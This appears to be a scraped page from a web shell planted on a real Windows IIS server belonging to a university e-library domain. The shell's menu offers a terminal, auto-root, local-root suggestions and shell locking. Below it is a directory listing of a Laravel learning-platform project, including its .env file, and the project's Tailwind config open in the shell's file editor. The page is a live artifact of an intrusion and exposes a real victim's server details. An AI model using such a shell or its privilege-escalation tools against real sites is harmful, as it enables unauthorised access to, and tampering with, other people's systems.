Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 18.219.66.32
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
wwwroot /
moocs-fti /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2025-04-26 20:24
Modules
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
app
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
assets
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
bootstrap
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
config
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
database
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
lang
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
public
[ DIR ]
drwxrwxrwx
2025-04-27 12:54
resources
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
routes
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
storage
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
stubs
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
tests
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
vendor
[ DIR ]
drwxrwxrwx
2025-04-03 23:42
.DS_Store
10
KB
-rw-rw-rw-
2025-03-29 23:18
.editorconfig
258
B
-rw-rw-rw-
2024-12-11 18:24
.env
993
B
-rw-rw-rw-
2025-04-20 23:02
.env.example
114
B
-rw-rw-rw-
2025-02-19 20:56
.gitattributes
186
B
-rw-rw-rw-
2024-12-11 18:24
.gitignore
866
B
-rw-rw-rw-
2025-04-01 12:59
README.md
18
B
-rw-rw-rw-
2024-12-11 18:24
artisan
350
B
-rw-rw-rw-
2024-12-11 18:24
composer.json
2.65
KB
-rw-rw-rw-
2025-03-05 18:30
composer.lock
366.38
KB
-rw-rw-rw-
2025-03-05 18:32
modules_statuses.json
118
B
-rw-rw-rw-
2025-03-05 17:35
package-lock.json
483.57
KB
-rw-rw-rw-
2025-02-19 20:56
package.json
794
B
-rw-rw-rw-
2025-02-19 20:47
phpunit.xml
1.16
KB
-rw-rw-rw-
2024-12-11 18:24
pint.json
225
B
-rw-rw-rw-
2024-12-11 18:24
ref.md
154
B
-rw-rw-rw-
2025-03-30 02:40
tailwind.config-backend.js
5.94
KB
-rw-rw-rw-
2025-02-19 20:56
tailwind.config.js
4.38
KB
-rw-rw-rw-
2025-03-05 17:35
vite-module-loader.js
1.43
KB
-rw-rw-rw-
2024-12-11 18:24
vite.config.js
877
B
-rw-rw-rw-
2025-02-19 20:47
web.config
2.77
KB
-rw-rw-rw-
2025-04-04 00:40
Save
Rename
/** @type {import('tailwindcss').Config} */ export default { content: [ "./Modules/LMS/resources/views/**/*.blade.php", "./Modules/LMS/resources/views/*/*.blade.php", "/Modules/LMS/resources/", "/Modules/Roles/resources/", "./Modules/Roles/resources/views/**/*.blade.php", "./Modules/Roles/resources/views/*/*.blade.php", "./resources/**/*.vue", "./public/lms/assets/js/layout.js", ], darkMode: "selector", theme: { container: { center: true, }, fontFamily: { urbanist: ["Urbanist", "sans-serif"], spline_sans: ["Spline Sans", "sans-serif"], public_sans: ["Public Sans", "sans-serif"], remix: ["remixicon"], }, extend: { screens: { "3xl": "1536px", "2xl": "1440px", }, gridTemplateColumns: { 13: "repeat(13, minmax(0, 1fr))", }, colors: { "body-light": "#F3F3F3", heading: "#251F47", primary: { DEFAULT: "#5F71FA", 100: "#E5DEFF", 200: "#DFE3FE", 300: "#B39EF9", 400: "#9C84F4", 500: "#5F71FA", 600: "#5B43CB", }, secondary: { DEFAULT: "#76D466", }, gray: { 200: "#EEE", 900: "#999", 500: "#555", }, danger: { DEFAULT: "#FF4626", 200: "#ff462633", }, warning: { DEFAULT: "#FFA305", }, success: { DEFAULT: "#66CC33", }, info: { DEFAULT: "#498CFF", 200: "#EAF2FF", }, disable: { DEFAULT: "#999", }, light: { DEFAULT: "#19213D", }, pink: { DEFAULT: "#D777F9", }, extra: { DEFAULT: "#18DAB5", }, form: "#E7E7E7", blog: "#FAFAFA", "student-course": "#F9F8FF", "input-border": "#C2C2C2", "black-200": "#1C1C1C", orange: "#EC8B00", "star-mail": "#FDBF20", "form-inputs": "#D1D4E3", dark: { body: "#000011", card: { DEFAULT: "#04041D", two: "#090927", shade: "#151541", }, text: { DEFAULT: "#D7D7D7", two: "#A0A0A0", }, border: { DEFAULT: "#212146", two: "#111133", three: "#13133D", four: "#2B2B65", five: "#292559", }, icon: { DEFAULT: "#23234D", }, chart: { "layer-one": "#151541", "layer-two": "#493B94", "layer-three": "#5B43CB", }, tooltip: { DEFAULT: "#1A1A3E", }, }, }, borderRadius: { 10: "10px", 15: "15px", 20: "20px", 25: "25px", 30: "30px", 50: "50%", }, backgroundImage: { checked: "url(../images/icons/checked.svg)", "progress-bar-bg": "linear-gradient(to bottom, #BCABFF 0.01%, #DDFFD8 100%)", "progress-bar": "linear-gradient(160.44deg, #7D5DFE 0.01%, #76D466 100%)", "doc-hero": "url(../images/doc-hero-graphical-element.png)", }, backgroundSize: { "100%": "100% 100%", }, backgroundPosition: { "right-center": "right 10% center", }, boxShadow: { header: "4px -2px 25px #11111129", progress_card_sm_1: "8px 8px 20px 0px rgba(13, 0, 65, 0.05)", "menu-dropdown": "5px 5px 8px -2px rgba(0, 0, 0,0.2)", "paginate-shadow": "0px 4px 12px 0px rgba(27,10,97,0.08)", }, keyframes: { "hand-wave": { "0%": { transform: "rotate(0.0deg)" }, "10%": { transform: "rotate(14.0deg)" }, "20%": { transform: "rotate(-8.0deg)" }, "30%": { transform: "rotate(14.0deg)" }, "40%": { transform: "rotate(-4.0deg)" }, "50%": { transform: "rotate(10.0deg)" }, "60%": { transform: "rotate(0.0deg)" }, "100%": { transform: "rotate(0.0deg)" }, }, }, animation: { "spin-slow": "spin 3.5s linear infinite", "hand-wave": "hand-wave 2.5s linear infinite", }, spacing: { header: "80px", "app-menu": "290px", "app-menu-sm": "70px", "ins-pro-img": "85px", 13: "3.25rem", 15: "3.75rem", }, height: { screen: "100vh", }, zIndex: { backdrop: 149, modal: 150, }, }, }, plugins: [require("tailwindcss-rtl")], };